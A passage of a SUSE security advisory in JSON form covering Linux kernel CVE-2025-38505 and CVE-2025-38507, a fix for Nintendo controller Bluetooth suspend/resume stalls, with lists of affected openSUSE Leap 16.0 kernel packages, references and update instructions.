"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-38505"
},
{
"cve": "CVE-2025-38507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38507"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: nintendo: avoid bluetooth suspend/resume stalls\n\nEnsure we don\u0027t stall or panic the kernel when using bluetooth-connected\ncontrollers. This was reported as an issue on android devices using\nkernel 6.6 due to the resume hook which had been added for usb joycons.\n\nFirst, set a new state value to JOYCON_CTLR_STATE_SUSPENDED in a\nnewly-added nintendo_hid_suspend. This makes sure we will not stall out\nthe kernel waiting for input reports during led classdev suspend. The\nstalls could happen if connectivity is unreliable or lost to the\ncontroller prior to suspend.\n\nSecond, since we lose connectivity during suspend, do not try\njoycon_init() for bluetooth controllers in the nintendo_hid_resume path.\n\nTested via multiple suspend/resume flows when using the controller both\nin USB and bluetooth modes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38507",
"url": "https://www.suse.com/security/cve/CVE-2025-38507"
},
{
"category": "external",
"summary": "SUSE Bug 1248188 for CVE-2025-38507",
"url": "https://bugzilla.suse.com/1248188"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
